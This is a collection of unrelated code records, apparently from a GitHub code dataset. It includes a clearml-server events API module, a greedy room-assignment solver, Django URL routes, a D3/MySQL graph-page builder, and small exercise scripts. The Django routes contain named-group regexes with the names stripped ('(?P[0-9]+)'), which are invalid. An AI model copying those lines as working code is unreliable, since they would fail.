{\"task\": task_id, \"task_name\": task_names.get(task_id), \"values\": values}\n for task_id, values in value_metrics.items()\n ]\n\n\n@endpoint(\"events.get_task_single_value_metrics\")\ndef get_task_single_value_metrics(\n call, company_id: str, request: SingleValueMetricsRequest\n):\n companies = _get_task_or_model_index_companies(\n company_id, request.tasks, request.model_events\n )\n call.result.data = dict(\n tasks=_get_single_value_metrics_response(\n companies=companies,\n value_metrics=event_bll.metrics.get_task_single_value_metrics(\n companies=companies\n ),\n )\n )\n\n\n@endpoint(\"events.get_multi_task_plots\", required_fields=[\"tasks\"])\ndef get_multi_task_plots_v1_7(call, company_id, _):\n task_ids = call.data[\"tasks\"]\n iters = call.data.get(\"iters\", 1)\n scroll_id = call.data.get(\"scroll_id\")\n\n companies = _get_task_or_model_index_companies(company_id, task_ids)\n\n # Get last 10K events by iteration and group them by unique metric+variant, returning top events for combination\n result = event_bll.get_task_events(\n list(companies),\n task_ids,\n event_type=EventType.metrics_plot,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n size=10000,\n scroll_id=scroll_id,\n )\n\n task_names = {\n t.id: t.name for t in itertools.chain.from_iterable(companies.values())\n }\n return_events = _get_top_iter_unique_events_per_task(\n result.events, max_iters=iters, task_names=task_names\n )\n\n call.result.data = dict(\n plots=return_events,\n returned=len(return_events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\ndef _get_multitask_plots(\n companies: TaskCompanies,\n last_iters: int,\n last_iters_per_task_metric: bool,\n metrics: MetricVariants = None,\n scroll_id=None,\n no_scroll=True,\n) -> Tuple[dict, int, str]:\n task_names = {\n t.id: t.name for t in itertools.chain.from_iterable(companies.values())\n }\n result = event_bll.get_task_events(\n company_id=list(companies),\n task_id=list(task_names),\n event_type=EventType.metrics_plot,\n metrics=metrics,\n last_iter_count=last_iters,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n scroll_id=scroll_id,\n no_scroll=no_scroll,\n size=config.get(\n \"services.events.events_retrieval.multi_plots_batch_size\", 1000\n ),\n last_iters_per_task_metric=last_iters_per_task_metric,\n )\n return_events = _get_top_iter_unique_events_per_task(\n result.events, max_iters=last_iters, task_names=task_names\n )\n return return_events, result.total_events, result.next_scroll_id\n\n\n@endpoint(\"events.get_multi_task_plots\", min_version=\"1.8\")\ndef get_multi_task_plots(call, company_id, request: MultiTaskPlotsRequest):\n companies = _get_task_or_model_index_companies(\n company_id, request.tasks, model_events=request.model_events\n )\n return_events, total_events, next_scroll_id = _get_multitask_plots(\n companies=companies,\n last_iters=request.iters,\n scroll_id=request.scroll_id,\n no_scroll=request.no_scroll,\n last_iters_per_task_metric=request.last_iters_per_task_metric,\n )\n call.result.data = dict(\n plots=return_events,\n returned=len(return_events),\n total=total_events,\n scroll_id=next_scroll_id,\n )\n\n\n@endpoint(\"events.get_task_plots\", required_fields=[\"task\"])\ndef get_task_plots_v1_7(call, company_id, _):\n task_id = call.data[\"task\"]\n iters = call.data.get(\"iters\", 1)\n scroll_id = call.data.get(\"scroll_id\")\n\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n # events, next_scroll_id, total_events = 
event_bll.get_task_events(\n # company, task_id,\n # event_type=\"plot\",\n # sort=[{\"iter\": {\"order\": \"desc\"}}],\n # last_iter_count=iters,\n # scroll_id=scroll_id)\n\n # get last 10K events by iteration and group them by unique metric+variant, returning top events for combination\n result = event_bll.get_task_events(\n task.get_index_company(),\n task_id,\n event_type=EventType.metrics_plot,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n size=10000,\n scroll_id=scroll_id,\n )\n\n return_events = _get_top_iter_unique_events(result.events, max_iters=iters)\n\n call.result.data = dict(\n plots=return_events,\n returned=len(return_events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\ndef _get_metric_variants_from_request(\n req_metrics: Sequence[ApiMetrics],\n) -> Optional[MetricVariants]:\n if not req_metrics:\n return None\n\n return {m.metric: m.variants for m in req_metrics}\n\n\n@endpoint(\n \"events.get_task_plots\", min_version=\"1.8\", request_data_model=TaskPlotsRequest\n)\ndef get_task_plots(call, company_id, request: TaskPlotsRequest):\n task_id = request.task\n iters = request.iters\n\n task_or_model = _assert_task_or_model_exists(\n company_id, task_id, model_events=request.model_events\n )[0]\n result = event_bll.get_task_plots(\n task_or_model.get_index_company(),\n task_id=task_id,\n last_iterations_per_plot=iters,\n metric_variants=_get_metric_variants_from_request(request.metrics),\n )\n\n return_events = result.events\n\n call.result.data = dict(\n plots=return_events,\n returned=len(return_events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\ndef _task_metrics_dict_from_request(req_metrics: Sequence[TaskMetric]) -> dict:\n task_metrics = defaultdict(dict)\n for tm in req_metrics:\n task_metrics[tm.task][tm.metric] = tm.variants\n for metrics in task_metrics.values():\n if None in metrics:\n metrics.clear()\n\n return task_metrics\n\n\ndef _get_metrics_response(metric_events: Sequence[tuple]) -> Sequence[MetricEvents]:\n return [\n MetricEvents(\n task=task,\n iterations=[\n IterationEvents(iter=iteration[\"iter\"], events=iteration[\"events\"])\n for iteration in iterations\n ],\n )\n for (task, iterations) in metric_events\n ]\n\n\n@endpoint(\n \"events.plots\",\n request_data_model=MetricEventsRequest,\n response_data_model=MetricEventsResponse,\n)\ndef task_plots(call, company_id, request: MetricEventsRequest):\n task_metrics = _task_metrics_dict_from_request(request.metrics)\n task_ids = list(task_metrics)\n task_or_models = _assert_task_or_model_exists(\n company_id, task_ids=task_ids, model_events=request.model_events\n )\n result = event_bll.plots_iterator.get_task_events(\n companies={t.id: t.get_index_company() for t in task_or_models},\n task_metrics=task_metrics,\n iter_count=request.iters,\n navigate_earlier=request.navigate_earlier,\n refresh=request.refresh,\n state_id=request.scroll_id,\n )\n\n call.result.data_model = MetricEventsResponse(\n scroll_id=result.next_scroll_id,\n metrics=_get_metrics_response(result.metric_events),\n )\n\n\n@endpoint(\"events.debug_images\", required_fields=[\"task\"])\ndef get_debug_images_v1_7(call, company_id, _):\n task_id = call.data[\"task\"]\n iters = call.data.get(\"iters\") or 1\n scroll_id = call.data.get(\"scroll_id\")\n\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n # events, next_scroll_id, total_events = event_bll.get_task_events(\n # company, task_id,\n # 
event_type=\"training_debug_image\",\n # sort=[{\"iter\": {\"order\": \"desc\"}}],\n # last_iter_count=iters,\n # scroll_id=scroll_id)\n\n # get last 10K events by iteration and group them by unique metric+variant, returning top events for combination\n result = event_bll.get_task_events(\n task.get_index_company(),\n task_id,\n event_type=EventType.metrics_image,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n size=10000,\n scroll_id=scroll_id,\n )\n\n return_events = _get_top_iter_unique_events(result.events, max_iters=iters)\n\n call.result.data = dict(\n task=task_id,\n images=return_events,\n returned=len(return_events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\n@endpoint(\"events.debug_images\", min_version=\"1.8\", required_fields=[\"task\"])\ndef get_debug_images_v1_8(call, company_id, _):\n task_id = call.data[\"task\"]\n iters = call.data.get(\"iters\") or 1\n scroll_id = call.data.get(\"scroll_id\")\n model_events = call.data.get(\"model_events\", False)\n\n tasks_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=model_events,\n )[0]\n result = event_bll.get_task_events(\n tasks_or_model.get_index_company(),\n task_id,\n event_type=EventType.metrics_image,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n last_iter_count=iters,\n scroll_id=scroll_id,\n )\n\n return_events = result.events\n\n call.result.data = dict(\n task=task_id,\n images=return_events,\n returned=len(return_events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\n@endpoint(\n \"events.debug_images\",\n min_version=\"2.7\",\n request_data_model=MetricEventsRequest,\n response_data_model=MetricEventsResponse,\n)\ndef get_debug_images(call, company_id, request: MetricEventsRequest):\n task_metrics = _task_metrics_dict_from_request(request.metrics)\n task_ids = list(task_metrics)\n task_or_models = _assert_task_or_model_exists(\n company_id, task_ids=task_ids, model_events=request.model_events\n )\n result = event_bll.debug_images_iterator.get_task_events(\n companies={t.id: t.get_index_company() for t in task_or_models},\n task_metrics=task_metrics,\n iter_count=request.iters,\n navigate_earlier=request.navigate_earlier,\n refresh=request.refresh,\n state_id=request.scroll_id,\n )\n\n call.result.data_model = MetricEventsResponse(\n scroll_id=result.next_scroll_id,\n metrics=_get_metrics_response(result.metric_events),\n )\n\n\n@endpoint(\n \"events.get_debug_image_sample\",\n min_version=\"2.12\",\n request_data_model=GetVariantSampleRequest,\n)\ndef get_debug_image_sample(call, company_id, request: GetVariantSampleRequest):\n task_or_model = _assert_task_or_model_exists(\n company_id,\n request.task,\n model_events=request.model_events,\n )[0]\n res = event_bll.debug_image_sample_history.get_sample_for_variant(\n company_id=task_or_model.get_index_company(),\n task=request.task,\n metric=request.metric,\n variant=request.variant,\n iteration=request.iteration,\n refresh=request.refresh,\n state_id=request.scroll_id,\n navigate_current_metric=request.navigate_current_metric,\n )\n call.result.data = attr.asdict(res, recurse=False)\n\n\n@endpoint(\n \"events.next_debug_image_sample\",\n min_version=\"2.12\",\n request_data_model=NextHistorySampleRequest,\n)\ndef next_debug_image_sample(call, company_id, request: NextHistorySampleRequest):\n task_or_model = _assert_task_or_model_exists(\n company_id,\n request.task,\n model_events=request.model_events,\n )[0]\n res = event_bll.debug_image_sample_history.get_next_sample(\n 
company_id=task_or_model.get_index_company(),\n task=request.task,\n state_id=request.scroll_id,\n navigate_earlier=request.navigate_earlier,\n next_iteration=request.next_iteration,\n )\n call.result.data = attr.asdict(res, recurse=False)\n\n\n@endpoint(\n \"events.get_plot_sample\",\n request_data_model=GetMetricSamplesRequest,\n)\ndef get_plot_sample(call, company_id, request: GetMetricSamplesRequest):\n task_or_model = _assert_task_or_model_exists(\n company_id,\n request.task,\n model_events=request.model_events,\n )[0]\n res = event_bll.plot_sample_history.get_samples_for_metric(\n company_id=task_or_model.get_index_company(),\n task=request.task,\n metric=request.metric,\n iteration=request.iteration,\n refresh=request.refresh,\n state_id=request.scroll_id,\n navigate_current_metric=request.navigate_current_metric,\n )\n call.result.data = attr.asdict(res, recurse=False)\n\n\n@endpoint(\n \"events.next_plot_sample\",\n request_data_model=NextHistorySampleRequest,\n)\ndef next_plot_sample(call, company_id, request: NextHistorySampleRequest):\n task_or_model = _assert_task_or_model_exists(\n company_id,\n request.task,\n model_events=request.model_events,\n )[0]\n res = event_bll.plot_sample_history.get_next_sample(\n company_id=task_or_model.get_index_company(),\n task=request.task,\n state_id=request.scroll_id,\n navigate_earlier=request.navigate_earlier,\n next_iteration=request.next_iteration,\n )\n call.result.data = attr.asdict(res, recurse=False)\n\n\n@endpoint(\"events.get_task_metrics\", request_data_model=TaskMetricsRequest)\ndef get_task_metrics(call: APICall, company_id, request: TaskMetricsRequest):\n task_or_models = _assert_task_or_model_exists(\n company_id,\n request.tasks,\n model_events=request.model_events,\n )\n res = event_bll.metrics.get_task_metrics(\n task_or_models[0].get_index_company(),\n task_ids=request.tasks,\n event_type=request.event_type,\n )\n call.result.data = {\n \"metrics\": [{\"task\": task, \"metrics\": metrics} for (task, metrics) in res]\n }\n\n\n@endpoint(\"events.delete_for_task\", required_fields=[\"task\"])\ndef delete_for_task(call, company_id, _):\n task_id = call.data[\"task\"]\n allow_locked = call.data.get(\"allow_locked\", False)\n\n task_bll.assert_exists(company_id, task_id, return_tasks=False)\n call.result.data = dict(\n deleted=event_bll.delete_task_events(\n company_id, task_id, allow_locked=allow_locked\n )\n )\n\n\n@endpoint(\"events.delete_for_model\", required_fields=[\"model\"])\ndef delete_for_model(call: APICall, company_id: str, _):\n model_id = call.data[\"model\"]\n allow_locked = call.data.get(\"allow_locked\", False)\n\n model_bll.assert_exists(company_id, model_id, return_models=False)\n call.result.data = dict(\n deleted=event_bll.delete_task_events(\n company_id, model_id, allow_locked=allow_locked, model=True\n )\n )\n\n\n@endpoint(\"events.clear_task_log\")\ndef clear_task_log(call: APICall, company_id: str, request: ClearTaskLogRequest):\n task_id = request.task\n\n task_bll.assert_exists(company_id, task_id, return_tasks=False)\n call.result.data = dict(\n deleted=event_bll.clear_task_log(\n company_id=company_id,\n task_id=task_id,\n allow_locked=request.allow_locked,\n threshold_sec=request.threshold_sec,\n )\n )\n\n\ndef _get_top_iter_unique_events_per_task(\n events, max_iters: int, task_names: Mapping[str, str]\n):\n key_fields = (\"metric\", \"variant\", \"task\")\n unique_events = itertools.chain.from_iterable(\n itertools.islice(group, max_iters)\n for _, group in itertools.groupby(\n sorted(events, 
key=itemgetter(*(key_fields + (\"iter\",))), reverse=True),\n            key=itemgetter(*key_fields),\n        )\n    )\n\n    def collect(evs, fields):\n        if not fields:\n            evs = list(evs)\n            return {\"name\": task_names.get(evs[0].get(\"task\")), \"plots\": evs}\n        return {\n            str(k): collect(group, fields[1:])\n            for k, group in itertools.groupby(evs, key=itemgetter(fields[0]))\n        }\n\n    collect_fields = (\"metric\", \"variant\", \"task\", \"iter\")\n    return collect(\n        sorted(unique_events, key=itemgetter(*collect_fields), reverse=True),\n        collect_fields,\n    )\n\n\ndef _get_top_iter_unique_events(events, max_iters):\n    top_unique_events = defaultdict(list)\n    for ev in events:\n        key = ev.get(\"metric\", \"\") + ev.get(\"variant\", \"\")\n        evs = top_unique_events[key]\n        if len(evs) < max_iters:\n            evs.append(ev)\n    unique_events = list(\n        itertools.chain.from_iterable(list(top_unique_events.values()))\n    )\n    unique_events.sort(key=lambda e: e[\"iter\"], reverse=True)\n    return unique_events\n\n\nclass ScalarMetricsIterRawScroll(Scroll):\n    from_key_value = jsonmodels.fields.StringField()\n    total = jsonmodels.fields.IntField()\n    request: ScalarMetricsIterRawRequest = jsonmodels.fields.EmbeddedField(\n        ScalarMetricsIterRawRequest\n    )\n\n\n@endpoint(\"events.scalar_metrics_iter_raw\", min_version=\"2.16\")\ndef scalar_metrics_iter_raw(\n    call: APICall, company_id: str, request: ScalarMetricsIterRawRequest\n):\n    key = request.key or ScalarKeyEnum.iter\n    scalar_key = ScalarKey.resolve(key)\n    if request.batch_size and request.batch_size < 0:\n        raise errors.bad_request.ValidationError(\n            \"batch_size should be a non-negative number\"\n        )\n\n    if not request.scroll_id:\n        from_key_value = None\n        total = None\n        request.batch_size = request.batch_size or 10_000\n    else:\n        try:\n            scroll = ScalarMetricsIterRawScroll.from_scroll_id(request.scroll_id)\n        except ValueError:\n            raise errors.bad_request.InvalidScrollId(scroll_id=request.scroll_id)\n\n        if scroll.from_key_value is None:\n            return make_response(\n                scroll_id=request.scroll_id, total=scroll.total, variants={}\n            )\n\n        from_key_value = scalar_key.cast_value(scroll.from_key_value)\n        total = scroll.total\n        request.batch_size = request.batch_size or scroll.request.batch_size\n\n    task_id = request.task\n    task_or_model = _assert_task_or_model_exists(\n        company_id, task_id, model_events=request.model_events\n    )[0]\n    metric_variants = _get_metric_variants_from_request([request.metric])\n\n    if request.count_total and total is None:\n        total = event_bll.events_iterator.count_task_events(\n            event_type=EventType.metrics_scalar,\n            company_id=task_or_model.get_index_company(),\n            task_id=task_id,\n            metric_variants=metric_variants,\n        )\n\n    batch_size = min(\n        request.batch_size,\n        int(\n            config.get(\"services.events.events_retrieval.max_raw_scalars_size\", 200_000)\n        ),\n    )\n\n    events = []\n    for _ in range(math.ceil(batch_size / 10_000)):\n        res = event_bll.events_iterator.get_task_events(\n            event_type=EventType.metrics_scalar,\n            company_id=task_or_model.get_index_company(),\n            task_id=task_id,\n            batch_size=min(batch_size, 10_000),\n            navigate_earlier=False,\n            from_key_value=from_key_value,\n            metric_variants=metric_variants,\n            key=key,\n        )\n        if not res.events:\n            break\n        events.extend(res.events)\n        from_key_value = str(events[-1][scalar_key.field])\n\n    key = str(key)\n    variants = {\n        variant: extract_properties_to_lists(\n            [\"value\", scalar_key.field], events, target_keys=[\"y\", key]\n        )\n        for variant, events in bucketize(events, key=itemgetter(\"variant\")).items()\n    }\n\n    
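# (reviewer note, not in the original source) at this point `variants` appears to map\n    # each variant name to parallel lists keyed by \"y\" and by the scalar key field, e.g.\n    # for key == \"iter\": {\"train\": {\"y\": [0.91, 0.87], \"iter\": [100, 200]}, ...}\n    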
call.kpis[\"events\"] = len(events)\n\n scroll = ScalarMetricsIterRawScroll(\n from_key_value=str(events[-1][scalar_key.field]) if events else None,\n total=total,\n request=request,\n )\n\n return make_response(\n returned=len(events),\n total=total,\n scroll_id=scroll.get_scroll_id(),\n variants=variants,\n )\n\n\n@endpoint(\"events.clear_scroll\", min_version=\"2.18\")\ndef clear_scroll(_, __, request: ClearScrollRequest):\n if request.scroll_id:\n event_bll.clear_scroll(request.scroll_id)\n","repo_name":"allegroai/clearml-server","sub_path":"apiserver/services/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":37183,"program_lang":"python","lang":"en","doc_type":"code","stars":334,"dataset":"github-code","pt":"21"} +{"seq_id":"39947995952","text":"import networkx as nx\n\nfrom parse import *\nfrom utils import *\nimport glob\nimport sys\n\n\ndef solve(G, s):\n \"\"\"\n Args:\n G: networkx.Graph\n s: stress_budget\n Returns:\n D: Dictionary mapping for student to breakout room r e.g. {0:2, 1:0, 2:1, 3:2}\n k: Number of breakout rooms\n \"\"\"\n\n # TODO: your code here!\n D = {}\n k = 0\n \n students_left = G.number_of_nodes()\n student_pairs = G.edges\n student_pair_to_ratio = {}\n for pair in student_pairs:\n #print(G.edges[pair][\"stress\"], pair)\n ratio = 100000\n if G.edges[pair][\"stress\"] > 0:\n ratio = G.edges[pair][\"happiness\"] / G.edges[pair][\"stress\"]\n student_pair_to_ratio[pair] = [ratio, G.edges[pair][\"happiness\"]]\n student_pair_to_ratio = sorted(student_pair_to_ratio.items(), key = lambda x: (x[1][0], x[1][1]), reverse=True)\n\n room_to_students = {}\n\n while students_left > 0 and k < G.number_of_nodes():\n students_left = G.number_of_nodes()\n k += 1\n D.clear()\n #students_remaining = student_pair_to_ratio.copy()\n #print(\"Number of breakout rooms so far: \" + str(k))\n #print(\"Stress Threshoed: \" + str(s/k))\n for r in range(k):\n #room_stress = 0\n room_to_students[r] = []\n for pair_and_ratio in student_pair_to_ratio:\n pair = pair_and_ratio[0]\n student_1 = pair[0]\n student_2 = pair[1]\n #print(\"First student pair: \" + str(pair_and_ratio))\n # If both students are already in assigned rooms, go to next pair\n if student_1 in D.keys() and student_2 in D.keys():\n #print(\"Both students in this pair are already assigned to rooms.\")\n continue\n temp = room_to_students[r].copy()\n temp.extend(pair)\n #print(\"Students in room \" + str(r) +\": \" + str(room_to_students[r]))\n #print(\"Stress in this room: \" + str(calculate_stress_for_room(room_to_students[r], G)))\n if calculate_stress_for_room(temp, G) <= s/k:\n if student_1 not in D.keys() and student_2 not in D.keys():\n D[student_1] = r\n D[student_2] = r\n room_to_students[r].extend(pair)\n students_left -= 2\n elif student_1 in room_to_students[r] and student_2 not in D.keys():\n D[student_2] = r\n room_to_students[r].append(student_2)\n students_left -= 1\n elif student_1 not in D.keys() and student_2 in room_to_students[r]:\n D[student_1] = r\n room_to_students[r].append(student_1)\n students_left -= 1\n elif r + 1 >= k:\n break\n #print(\"Number of unassigned students: \" + str(students_left))\n\n #print(student_pair_to_ratio[0][0])\n return D, k\n\n\n# Here's an example of how to run your solver.\n\n# Usage: python3 solver.py test.in\n\n\"\"\"\nif __name__ == '__main__':\n assert len(sys.argv) == 2\n path = sys.argv[1]\n G, s = read_input_file(path)\n solve(G, s)\n D, k = solve(G, s)\n assert is_valid_solution(D, G, s, k)\n print(\"Total Happiness: 
{}\".format(calculate_happiness(D, G)))\n print(\"Number of Breakout Rooms: \" + str(k))\n print(D)\n #write_output_file(D, 'out/test.out')\n\"\"\"\n\n# For testing a folder of inputs to create a folder of outputs, you can use glob (need to import it)\nif __name__ == '__main__':\n inputs = glob.glob('inputs/*')\n for input_path in inputs:\n output_path = 'outputs/' + str(input_path)[7:][:-3] + '.out'\n G, s = read_input_file(input_path)\n D, k = solve(G, s)\n assert is_valid_solution(D, G, s, k)\n happiness = calculate_happiness(D, G) \n write_output_file(D, output_path)\n","repo_name":"TheEthanDing/cs170_project","sub_path":"solver_naive_greedy.py","file_name":"solver_naive_greedy.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14904316525","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n # ^$ 는 현재 폴더를 의미\n url(r'^$',views.index, name = 'polls'),\n url(r'^signin/',views.signin, name='signin' ),\n url(r'^login/',views.login, name='login' ),\n url(r'^logout/',views.logout, name='logout' ),\n url(r'^register/',views.register, ),\n url(r'^index1/',views.index1, name = 'index1' ),\n url(r'^book/(?P[0-9]+)/$' ,views.bookdetail, name='bookdetail'),\n url(r'^rent/(?P[0-9]+)/$', views.rent, name='rent'),\n url(r'^rentlist/', views.rentlist2, name='rentlist2'),\n # url(r'^dojoin/', views.dojoin, name='dojoin'),\n # \n]\n","repo_name":"chaezz/django-firstweb","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15980932710","text":"# -*- coding: utf-8 -*-\n# 3.0\n\n# \n\n# Generation 4 graph builder library\n\n# \n\nimport json\nimport pymysql\nimport pandas.io.sql as psql\nimport unittest\n\nfrom settings_statmart import *\nimport utils_statmart as us\nimport gen4_html as html\nimport gen4_d3js_parts as d3\n\nimport imp\nimp.reload(d3)\n\n# \n\ndef build_file_name(config):\n return \"%s_%s.php\" % (config[\"prefix\"], config[\"suffix\"]);\n\n# \n\ndef get_all_series_json(config):\n df = \"\"\n with statmart_utils.get_db_connection() as cursor:\n query = \"\"\"\n SELECT identifier, description\n FROM series as S \n WHERE S.identifier like '%s%s%s'\n \"\"\" % (config(\"prefix\"), \"\\_%\\_\", config(\"suffix\"))\n df = psql.frame_query(query, con=cursor.connection)\n return json.dumps(df.as_matrix().tolist(),indent=4)\n\n# \n\ndef build_d3_head(title, include_path=\"../../inc/\",style_include=\"style_basic.php\"):\n meta = html.meta([(\"http-equiv\", \"content-type\"), (\"content\",\"text/html; charset=UTF-8\")])\n titl = html.title(title)\n scrp = html.script_ext(statmart_d3_path)\n styl = html.style(html.php_include(include_path + style_include))\n head = (\"\\n\").join([meta,titl,scrp,styl])\n return 
html.head(head)\n\n# \n\ndef build_d3_line_graph(config):\n script = []\n script.append(d3.metadata_iso3_map % (config[\"iso3_map\"])) \n script.append(d3.metadata_series_info_map % (config[\"series_info_map\"])) \n \n if \"currency_year\" in config:\n script.append(util_currency_converter_2005)\n \n if config[\"series_source\"] == \"params\":\n script.append(d3.util_function_get_parameters_by_name)\n if config[\"series_param\"] == \"iso3\":\n script.append(d3.js_series_name_from_iso3_parameter % (config[\"prefix\"],config[\"suffix\"]))\n elif config[\"series_param\"] == \"s\":\n script.append(d3.js_series_name_from_s_parameter)\n \n if config[\"data_source\"] == \"local\":\n script.append(d3.js_dataset_list % get_all_series_json(config))\n elif config[\"data_source\"] == \"query\":\n script.append(d3.js_data_url_series_query)\n \n script.append(d3.graph_set_title % (config[\"title\"])) \n if config[\"subtitle\"] == \"countryname\": \n script.append(d3.graph_set_subtitle_country)\n else:\n script.append(d3.graph_set_subtitle % (config[\"subtitle\"])) \n \n script.append(d3.graph_default_size)\n script.append(d3.graph_title_location)\n script.append(d3.graph_default_header)\n \n script.append(d3.include_js_d3_basic_axis)\n script.append(d3.js_d3_start_csv)\n \n if config[\"unit\"] == \"guess\":\n script.append(d3.js_unit_guess)\n else:\n script.append(d3.js_unit_set % (config[\"unit\"], str(config[\"multiplier\"])))\n \n script.append(d3.js_d3_process_annual_csv_data)\n script.append(d3.js_d3_build_simple_xy_domains)\n script.append(d3.js_d3_svg_build_x_axis)\n \n if config[\"y_axis_label\"] == \"unit\":\n script.append(d3.js_d3_svg_build_y_axis_unit_label)\n else:\n script.append(d3.js_d3_svg_build_y_axis_label % config[\"y_axis_label\"])\n \n script.append(d3.js_d3_svg_draw_line)\n script.append(d3.svg_draw_title)\n script.append(d3.svg_draw_subtitle)\n script.append(d3.svg_draw_source)\n script.append(d3.js_d3_end_csv)\n \n head = build_d3_head(config[\"indicator\"])\n body = html.body(html.script(\"\\n\".join(script)))\n page = html.html(head + \"\\n\" + body)\n page_name = build_file_name(config)\n us.mkdirs(config[\"gen_4_dir\"])\n page_file = open(config[\"gen_4_dir\"] + page_name, \"w\", encoding=\"utf8\")\n page_file.write(page)\n page_file.close() \n return page\n\n# \n\ndef get_iso3_map_json(config):\n df = \"\"\n with us.get_db_connection() as cursor:\n query = \"\"\"\n SELECT L.iso3, L.countryname, O.series, COUNT(O.dateid) as numberyears\n FROM observation as O\n INNER JOIN location as L ON O.locationid = L.id\n WHERE O.series like '%s\\_%s\\_%s'\n GROUP BY L.iso3\n \"\"\" % (config[\"prefix\"], \"%\", config[\"suffix\"])\n df = psql.frame_query(query, con=cursor.connection)\n df = df.set_index(\"iso3\")\n return df.to_json(orient=\"index\")\n\n# \n\ndef get_series_info_map_json(config):\n df = \"\"\n with us.get_db_connection() as cursor:\n query = \"\"\"\n SELECT identifier, originalsource, proximatesource\n FROM series\n WHERE series.identifier like '%s\\_%s\\_%s'\n \"\"\" % (config[\"prefix\"], \"%\", config[\"suffix\"])\n df = psql.frame_query(query, con=cursor.connection)\n df = df.set_index(\"identifier\")\n return df.to_json(orient=\"index\")\n\n# \n\ndef build_gen4_config(config, \n title=\"indicator\", \n subtitle=\"countryname\",\n y_axis_label=\"unit\",\n data_source=\"query\", \n series_source=\"params\", \n series_param=\"iso3\",\n unit=\"guess\"):\n config[\"iso3_map\"] = get_iso3_map_json(config)\n config[\"series_info_map\"] = 
get_series_info_map_json(config)\n config[\"title\"] = title\n if title == \"indicator\":\n config[\"title\"] = config[\"indicator\"]\n config[\"subtitle\"] = subtitle\n config[\"y_axis_label\"] = y_axis_label\n config[\"data_source\"] = data_source\n config[\"series_source\"] = series_source\n config[\"series_param\"] = series_param\n config[\"unit\"] = unit\n return config\n\n# \n\n\n","repo_name":"spikewilliams/statmart","sub_path":"scripts/gen4_utils.py","file_name":"gen4_utils.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8888745025","text":"'''\r\nCreated on 20160501\r\n\r\n@author: Kenneth Tse\r\n\r\nGiven a collection of distinct numbers, return all possible permutations.\r\n\r\nFor example,\r\n[1,2,3] have the following permutations:\r\n[1,2,3], [1,3,2], [2,1,3], [2,3,1], [3,1,2], and [3,2,1].\r\n\r\n'''\r\n\r\nclass Solution(object):\r\n def permute(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: List[List[int]]\r\n \"\"\"\r\n if nums is None or len(nums) == 0: return []\r\n if len(nums) == 1: return [nums]\r\n \r\n lessret = self.permute(nums[1:])\r\n \r\n ret = []\r\n \r\n for comb in lessret:\r\n for i in range(len(nums)):\r\n #ret.append(comb[:].insert(i, nums[0]))\r\n l = comb[:]\r\n l.insert(i, nums[0])\r\n ret.append(l)\r\n\r\n \r\n return ret\r\n \r\n \r\n\r\nif __name__ == '__main__':\r\n s = Solution()\r\n print(s.permute([1,2,3]))","repo_name":"DiamondGo/leetcode","sub_path":"python/Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25349446827","text":"heart = list(map(int, input().split('@')))\r\ncommand = input()\r\n\r\nid = 0\r\nwhile command != 'Love!':\r\n jump, ind = command.split()\r\n id += int(ind)\r\n if id >= len(heart):\r\n id = 0\r\n #print(id)\r\n if heart[id] == 0:\r\n print(f\"Place {id} already had Valentine's day.\")\r\n else:\r\n heart[id] -= 2\r\n if heart[id] == 0:\r\n print(f\"Place {id} has Valentine's day.\")\r\n #print(heart)\r\n command = input()\r\n\r\nif command == 'Love!':\r\n print(f\"Cupid's last position was {id}.\")\r\n if sum(heart) == 0:\r\n print('Mission was successful.')\r\n else:\r\n fail = [x for x in heart if x != 0]\r\n print(f\"Cupid has failed {len(fail)} places.\")","repo_name":"danilovabg/FundamentalsSoftUni","sub_path":"MID EXAM/04. Programming Fundamentals Mid Exam/03. Heart Delivery.py","file_name":"03. Heart Delivery.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25810735915","text":"\"\"\"Navigator dock widget and functionality\n\"\"\"\n\nimport os.path\nimport collections\nimport queue\n\nfrom PyQt5.QtCore import pyqtSignal, QObject, QThread, QTimer\nfrom PyQt5.QtWidgets import QFileDialog, QWidget\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5 import uic\n\n\nfrom enki.core.core import core\nfrom enki.core.uisettings import TextOption, CheckableOption\nimport enki.lib.get_console_output as gco\n\nfrom . import ctags\nfrom .dock import NavigatorDock\n\n\n# source map. 
